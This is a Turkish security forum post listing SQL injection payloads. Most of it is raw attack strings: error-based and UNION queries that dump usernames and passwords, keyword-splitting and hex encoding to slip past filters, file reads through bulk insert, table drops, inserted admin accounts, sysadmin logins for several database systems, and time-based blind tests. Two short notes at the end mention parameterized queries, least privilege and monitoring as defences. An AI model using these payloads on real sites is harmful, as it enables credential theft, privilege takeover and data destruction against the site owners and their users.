Forum >> Güvenlik Açıkları ve ipuçları >> Farklı Sql İnjection Yöntemleri |
ahmet Yeni Üye | 03 Temmuz 2010 Cumartesi 09:53:44
' and 1 in (select cast(x as varchar) from temp) -- ' union select * from msysobjects in 'c:\ <<< "Access SQL dosya okuma" ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- Burada select @@version ifadesini hex olarak kodladık: ; declare @x varchar(80); set @x = 0x73656c65637420404076657273696f6e; EXEC (@x) '; EXEC ('SEL' + 'ECT US' + 'ER') ' and 1 in (select cast(x as varchar) from temp) -- ' and 1 in (select min(filename ) from master.dbo.sysdatabases where filename >'.' ) -- ' union select 0, sysobjects.name + ': ' + syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1, 1, 1, 1 from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype -- ; bulk insert tempdb..passwords from 'c:\temp\passwords.txt' uni'on sel'ect @@version-'- 'update users set password='password' where username='admin'--' ' update News set Title=min( char(80), char(83) ) -- ya da ' update News set Title=char(80),char(70)-- ; insert into users values ( 0, char(0x31), char(0x34), 0xffff) << harfleri birleştiriyorsun, yani char(85)=m char(88)=u char(90)=r gibi, anladın mı? ; bulk insert foo from 'c:\inetbub\wwwroot\login.asp' << güzel gibi. ; create table foo( line varchar(8000) ) ' drop table foo -- ' union select ret,1,1,1 from foo-- ' union select min(password) from users where username > 'a' -- ' union select min(username) from users where username > 'a' -- ; insert into users values ( 0, 'admin', 'r00tr0x!', 0xffff) << login sayfalarında ' union select 1,username,password,4 -- <<< bunu giriş sayfalarında yapabiliriz. 'or 1=1 -- ; drop table users-- << login sayfalarında ' union select sum(username) from user-- >>> sayı fonksiyonu olabilir.
Not: Buradaki örneklerin tamamı, kullanıcı girdisinin SQL metnine doğrudan birleştirildiği sorgularda çalışır; parametreli sorgu (prepared statement) kullanıldığında girdi yalnızca veri olarak işlenir ve bu ifadeler komut olarak çalışmaz. `and 1 in (select ...)` kalıbı, veritabanının tür dönüştürme hatasını sayfada göstermesine dayanır; ayrıntılı hata mesajlarını kullanıcıya döndürmemek bu yolu kapatır.
' and 1 in (select substring (x, 256, 256) from temp) -- ' and 1 in (select @@servername ) -- MS SQL exec sp_addlogin 'victor', 'Pass123' exec sp_addsrvrolemember 'victor', 'sysadmin' MySQL INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123')) Access CREATE USER victor IDENTIFIED BY 'Pass123' Postgres (requires UNIX account) CREATE USER victor WITH PASSWORD 'Pass123' Oracle CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO victor; GRANT RESOURCE TO victor; MS Access; MsysACEs MsysObjects MsysQueries MsysRelationships ' and 1 in (select min(name ) from master.dbo.sysdatabases where name >'.' ) -- 'or'1'='1' UNI/**/ON SEL/**/ECT ya da ; declare @x nvarchar(80); set @x = N'SEL' + N'ECT US' + N'ER'); EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' formusr = ' or 1=1 – – formpwd = anything Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 $formacct = 1 or 1=1 # $formpin = 1111 Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111 ' and 1 in (select 'text' ) - - union select if( condition , benchmark (100000, sha1('test')), 'false' ),1,1,1,1; ' and condition and '1'='1 Could be as simple as ' and '1' = '1 Or ' and '1' = '2 union select if( user() like 'root@%', benchmark(50000,sha1('test')), 'false' );
Not: Hesap oluşturma ve rol atama örnekleri ancak uygulamanın veritabanı hesabı yönetici yetkisine sahipse sonuç verir; uygulama hesabına en az yetki ilkesine göre yalnızca gereken tablolarda gereken izinleri vermek bunları etkisiz kılar. `UNI/**/ON` ve `'SEL' || 'ECT'` gibi parçalama yöntemleri anahtar kelime filtrelerini atlatmak için kullanıldığından, kara liste filtreleri parametreli sorguların yerini tutmaz. benchmark() ile yapılan zaman tabanlı denemeler ise olağan dışı uzun süren sorgular izlenerek fark edilebilir.